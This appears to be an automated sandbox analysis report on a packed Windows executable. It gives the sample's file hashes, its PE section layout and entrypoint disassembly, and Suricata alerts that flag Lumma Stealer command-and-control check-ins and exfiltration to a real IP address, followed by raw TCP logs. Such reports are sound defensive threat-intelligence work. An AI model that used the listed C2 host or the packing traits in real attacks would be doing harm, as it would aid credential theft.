8.8.0.c.e.b.c.e.b.5.!.S.F.t.D.A.0.7.U.D.r...e.x.e.....T.a.r.g.e.t.A.p.p.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC52E.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Dec 24 10:22:43 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	292042
Entropy (8bit):	1.5076006176539263
Encrypted:	false
SSDEEP:	384:MJ2FOlK7VBBLnR4/ZwzY4jSnwQwgvmPUPzWD3Vr2h1VMOz8IQs18Ll7ogs1oa+Er:82bpBBLRYwzZblURcSW5oIvU6Pc
MD5:	7EEEB4C28318528F6E0A0769710AB60E
SHA1:	5AE0877AC5BAC94DEA00DAE85995490BB222EA6A
SHA-256:	3F4F319F8FC0E6B4FD29BF89F3210A1D29252F44BD046DC84F71D81D3A49D2E3
SHA-512:	C137089000CEAFDCECA35A3BBAB397425134CBD442CA7228B703184F6DB69A86E90CB0EA395E5186D87DC3F28EFCB9771AFE317922656DEA2055D78705F68808
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......s.jg....................................D....'..........L...........`.......8...........T............L...(...........(...........*..............................................................................eJ......`+......GenuineIntel............T...........O.jg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC9C2.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8384
Entropy (8bit):	3.703225478516776
Encrypted:	false
SSDEEP:	192:R6l7wVeJIc6R6Y9rSUKVpgmfI7prw89bCosfK2m:R6lXJ76R6YhSUKVpgmfILCbfS
MD5:	5FF3986CCEE858C3F27DB56EB2280AC7
SHA1:	8B5EAD9441AC144DE32EE34B3FDEDAC75AF06B90
SHA-256:	2092C58FC78007E221FCCE92841F9F362EE4B65EC7C69CC5C8C7AADA6BF11D6C
SHA-512:	D44174AF13DE976CD0FFE689EB57D9131D6E285D136020DC2C7EC1DC3A58684537712DEDF0ACFBFDC7F6E661BC2D9F8F5173D8AB7A28E491BC334AE96CC38819
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.5.7.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCA7F.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4624
Entropy (8bit):	4.503229120203179
Encrypted:	false
SSDEEP:	48:cvIwWl8zsUJg77aI9LgWpW8VYnaYm8M4J/LqFs0+q8Y985h/iR1d:uIjfSI7ZZ7V8TJ/r01Wh/iR1d
MD5:	514DB485DAFA32D6B72245BD0BD524A8
SHA1:	E8F7D89D7F97473E23221C997BB717954C66B024
SHA-256:	B9B37208C2B29DF0456DF8E203BDB0323DF91FF633873EDE18B33E699714D20C
SHA-512:	479D56BF2F65718D386DB0FC6A0AC30CBA075BD192073FD3C1C826D36D17A46D13A05D33808394405292AB1B3773EC01A9AFB7C1D206318C21F449234E4C1C29
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="645205" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.4654336235270495
Encrypted:	false
SSDEEP:	6144:OIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNXdwBCswSb2+:DXD94+WlLZMM6YFH1+2+
MD5:	652A962419293A24D52A5E92C618F1E9
SHA1:	F4FD96E58C859B04BC79CCD11E58EF6798665DD7
SHA-256:	46D5A7B430D73B7371448EFD076DD1FC7A6836DDB72A54DEA5B7F108E7892C19
SHA-512:	91BD3380A8C2EF68C25936A766B669A20040BECE38960C3EAC5A45BD598DF457C519A5F8719525BCDE16BC9C701E188C5D827AC6855D8F7EAA56805EBABE5EA8
Malicious:	false
Reputation:	low
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.....U...............................................................................................................................................................................................................................................................................................................................................$..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.564214764129766
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SFtDA07UDr.exe
File size:	2'911'744 bytes
MD5:	c7c35aa98a21f2d9b5a584f5f32b91a5
SHA1:	b9a135dce7f5fdbaac03a84650c869880cebceb5
SHA256:	e87601e6ed69dcfe547d8e8525083ee4f5f1cdfc0ae5c99a897445061adc8044
SHA512:	0134eca56eb157df97e5ec57f4614a9e72ff35146d8433118830865ca469bed139772c28b55c3b0f582c4de53d0f20cda266f6322e3fb1d0d1f52d18f5807249
SSDEEP:	49152:WmU/xYhDab/f2G8vIaHYzF0RopSJohk3VVVnzrxFNA:WmU/ChDS/f/8YdpSqhk3V7X7NA
TLSH:	38D51953F58873DFE49A1F78942BCDA6695E47B5072048C3B828BC7A7E63CC116B5C28
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig.............................@/...........@..........................p/.....\.,...@.................................Y@..m..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x6f4000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F768CB7EA8Ah
cmovl ebp, dword ptr [eax+eax]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F768CB80A85h
add byte ptr [0000000Ah], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+0Ah], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or al, 80h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx+ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or al, 80h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi], bh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], cl
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebx], cl
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x54059	0x6d	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x541f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x52000	0x26400	e2e4e891325ce240c1a561274b2763de	False	0.9995212928921569	data	7.982923087734826	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x53000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x54000	0x1000	0x200	39a711a7d804ccbc2a14eea65cf3c27e	False	0.154296875	data	1.0789976601211375	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
rhgudopy	0x55000	0x29e000	0x29d200	c942bd88e7ae70057008f90176325365	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ahjutyme	0x2f3000	0x1000	0x400	3e8d01ab25fcb6ea217568a44fa7c7af	False	0.8427734375	data	6.416738688720437	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x2f4000	0x3000	0x2200	67890b562b1190e7488e7d9b951e9870	False	0.05767463235294118	DOS executable (COM)	0.6883414612416259	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-24T11:22:14.299318+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49730	104.21.36.201	443	TCP
2024-12-24T11:22:15.298068+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49730	104.21.36.201	443	TCP
2024-12-24T11:22:15.298068+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49730	104.21.36.201	443	TCP
2024-12-24T11:22:16.534183+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49731	104.21.36.201	443	TCP
2024-12-24T11:22:17.308251+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49731	104.21.36.201	443	TCP
2024-12-24T11:22:17.308251+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49731	104.21.36.201	443	TCP
2024-12-24T11:22:19.744376+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49732	104.21.36.201	443	TCP
2024-12-24T11:22:20.866761+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49732	104.21.36.201	443	TCP
2024-12-24T11:22:22.174193+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49733	104.21.36.201	443	TCP
2024-12-24T11:22:24.544031+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49734	104.21.36.201	443	TCP
2024-12-24T11:22:27.440361+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49735	104.21.36.201	443	TCP
2024-12-24T11:22:29.963929+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49738	104.21.36.201	443	TCP
2024-12-24T11:22:36.513923+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49742	104.21.36.201	443	TCP
2024-12-24T11:22:37.284335+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49742	104.21.36.201	443	TCP
2024-12-24T11:22:39.250141+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49744	185.166.143.48	443	TCP
2024-12-24T11:22:41.512332+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49745	16.182.108.137	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 24, 2024 11:22:13.051774979 CET	49730	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:13.051831961 CET	443	49730	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:13.051970959 CET	49730	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:13.074145079 CET	49730	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:13.074176073 CET	443	49730	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:14.299196005 CET	443	49730	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:14.299318075 CET	49730	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:14.315669060 CET	49730	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:14.315692902 CET	443	49730	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:14.315984964 CET	443	49730	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:14.370359898 CET	49730	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:14.555243015 CET	49730	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:14.555274963 CET	49730	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:14.555392027 CET	443	49730	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:15.298161030 CET	443	49730	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:15.298434973 CET	443	49730	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:15.298494101 CET	49730	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:15.301744938 CET	49730	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:15.301765919 CET	443	49730	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:15.315759897 CET	49731	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:15.315804005 CET	443	49731	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:15.315867901 CET	49731	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:15.316287994 CET	49731	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:15.316308975 CET	443	49731	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:16.533935070 CET	443	49731	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:16.534183025 CET	49731	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:16.535301924 CET	49731	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:16.535331011 CET	443	49731	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:16.535571098 CET	443	49731	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:16.536780119 CET	49731	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:16.536806107 CET	49731	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:16.536854982 CET	443	49731	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:17.308305979 CET	443	49731	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:17.308435917 CET	443	49731	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:17.308489084 CET	49731	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:17.308512926 CET	443	49731	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:17.308619976 CET	443	49731	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:17.308671951 CET	49731	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:17.308681965 CET	443	49731	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:17.316225052 CET	443	49731	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:17.316281080 CET	49731	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:17.316291094 CET	443	49731	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:17.324623108 CET	443	49731	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:17.324680090 CET	49731	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:17.324688911 CET	443	49731	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:17.370385885 CET	49731	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:17.370413065 CET	443	49731	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:17.417217970 CET	49731	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:17.683762074 CET	443	49731	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:17.683842897 CET	443	49731	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:17.683916092 CET	49731	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:17.683937073 CET	443	49731	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:17.685928106 CET	443	49731	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:17.685991049 CET	49731	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:17.686002016 CET	443	49731	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:17.686260939 CET	443	49731	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:17.686350107 CET	49731	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:17.696085930 CET	49731	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:17.696106911 CET	443	49731	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:17.696130991 CET	49731	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:17.696139097 CET	443	49731	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:18.522701979 CET	49732	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:18.522728920 CET	443	49732	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:18.522803068 CET	49732	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:18.524616957 CET	49732	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:18.524633884 CET	443	49732	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:19.744255066 CET	443	49732	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:19.744375944 CET	49732	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:19.745935917 CET	49732	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:19.745943069 CET	443	49732	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:19.746273041 CET	443	49732	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:19.747442961 CET	49732	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:19.747580051 CET	49732	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:19.747618914 CET	443	49732	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:19.747682095 CET	49732	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:19.747689962 CET	443	49732	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:20.866914988 CET	443	49732	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:20.867238045 CET	443	49732	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:20.867311001 CET	49732	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:20.867472887 CET	49732	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:20.867487907 CET	443	49732	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:20.944333076 CET	49733	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:20.944454908 CET	443	49733	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:20.944577932 CET	49733	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:20.944916964 CET	49733	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:20.944953918 CET	443	49733	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:22.174101114 CET	443	49733	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:22.174192905 CET	49733	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:22.196247101 CET	49733	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:22.196279049 CET	443	49733	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:22.197077036 CET	443	49733	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:22.209198952 CET	49733	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:22.209320068 CET	49733	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:22.209419966 CET	443	49733	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:23.118289948 CET	443	49733	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:23.118418932 CET	443	49733	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:23.118469954 CET	49733	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:23.118591070 CET	49733	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:23.118622065 CET	443	49733	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:23.329632044 CET	49734	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:23.329669952 CET	443	49734	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:23.329758883 CET	49734	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:23.330092907 CET	49734	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:23.330106020 CET	443	49734	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:24.543947935 CET	443	49734	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:24.544030905 CET	49734	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:24.561666012 CET	49734	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:24.561686993 CET	443	49734	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:24.562005043 CET	443	49734	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:24.604821920 CET	49734	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:24.614387035 CET	49734	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:24.614515066 CET	49734	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:24.614550114 CET	443	49734	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:24.614610910 CET	49734	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:24.614622116 CET	443	49734	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:25.542413950 CET	443	49734	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:25.542527914 CET	443	49734	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:25.544389009 CET	49734	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:25.546560049 CET	49734	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:25.546575069 CET	443	49734	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:26.222340107 CET	49735	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:26.222393036 CET	443	49735	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:26.222465038 CET	49735	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:26.222738028 CET	49735	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:26.222754955 CET	443	49735	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:27.439886093 CET	443	49735	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:27.440361023 CET	49735	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:27.441402912 CET	49735	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:27.441416025 CET	443	49735	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:27.441668034 CET	443	49735	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:27.443121910 CET	49735	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:27.443121910 CET	49735	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:27.443162918 CET	443	49735	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:28.241317034 CET	443	49735	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:28.241415024 CET	443	49735	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:28.241518974 CET	49735	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:28.241719007 CET	49735	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:28.241735935 CET	443	49735	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:28.745810032 CET	49738	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:28.745861053 CET	443	49738	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:28.745930910 CET	49738	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:28.746436119 CET	49738	443	192.168.2.4	104.21.36.201
Dec 24, 2024 11:22:28.746450901 CET	443	49738	104.21.36.201	192.168.2.4
Dec 24, 2024 11:22:29.963711023 CET	443	49738	104.21.36.201	192.168.2.4
